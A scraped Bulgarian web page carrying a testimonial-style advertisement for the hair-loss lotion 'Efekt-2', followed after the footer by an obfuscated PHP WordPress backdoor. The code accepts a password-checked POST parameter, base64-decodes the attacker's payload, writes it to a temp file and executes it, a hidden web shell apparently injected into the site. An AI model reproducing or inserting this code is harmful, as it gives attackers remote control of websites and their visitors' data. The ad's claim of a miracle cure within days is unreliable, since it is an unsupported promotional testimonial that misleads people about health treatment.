В Испания оплешивях, но "Ефект-2" ме спаси от косопад | Косопад

В Испания оплешивях, но „Ефект-2” върна косата ми

оплешивяване и косопад

Илия Добролюбов: Косопадът спря благодарение на „Ефект -2“

Преди петнадесет години заминах за Испания, изпълнен с надежди за хубав живот. Беше ми трудно и като стотици други българи в началото спях по пейките, хвърлях се на най – черната работа. Препятствията не ме плашеха и устоях на стреса, здравето ми беше желязно. За разлика от много мои приятели, влажният и горещ климат на полуострова не ме повали. А повечето се оплакваха от болезнено подуване на ставите, косопад и сърдечни проблеми!

Преди около година останах без работа, защото кризата там също е жестока. Фирмата в която бях на постоянен договор фалира, оказах се на улицата. Доскоро изплащах апартамент на Средиземно море и това за кратко време стопи всичките ми спестявания. Принудих се да го продам на безценица и се върнах в България. Навярно стресът и промяната в климата ме събориха, защото няколко седмици след връщането у дома, получих страшен косопад и темето ми напълно олися.

Самият аз не се шокирах особено много, но съпругата ми настоя да взема спешни мерки. От Испания донесе някакви рецепти против косопад с коприва, които навремето помогнаха на една рускиня от завода. На мен не ми подействаха и спрях да се занимавам с това. Съвсем наскоро обаче жена ми прочела за лосиона „Ефект – 2” в пресата и на своя глава поръчала две шишета. Бях скептично настроен, но за да не я тревожа се намазах.

И стана някакво чудо! Интензивният косопад спря само след няколко дни, а на оголелите места започнаха да изникват нови косъмчета. Неволно се почувствах както в младежките си години, когато тепърва откривах света. Бях доволен, че съм зарадвал жена си, която остана единственият ми истински приятел в чужбина.

С уважение: Илия Добролюбов, Пловдив

27. март 2013 22:51:50 от Косопад
Категории: Лосион срещу косопад, Споделено | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}